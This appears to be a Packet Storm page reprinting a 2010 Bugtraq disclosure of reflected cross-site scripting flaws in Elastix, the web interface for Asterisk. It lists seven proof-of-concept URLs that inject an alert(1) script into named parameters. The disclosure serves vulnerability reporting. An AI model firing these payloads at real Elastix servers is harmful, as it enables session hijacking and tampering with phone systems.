The Elastix interface for Asterisk suffers from cross site scripting vulnerabilities.
3a094259a8cded44e43a66f5413a8ac6d7f4d9e204648efb752b610bda664c55Oh look I think bugtraq hates me ....
more lame xss in yet another voip management user interface for asterisk...
---------- Forwarded message ----------
From: dave b <db.pub.mail@gmail.com>
Date: 29 October 2010 03:36
Subject: xss in elastix
To: bugtraq@securityfocus.com
xss in elastix(http://www.elastix.org/) ,
1. https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
2. https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
3. https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
4. https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
5. https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
6. https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
7. https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed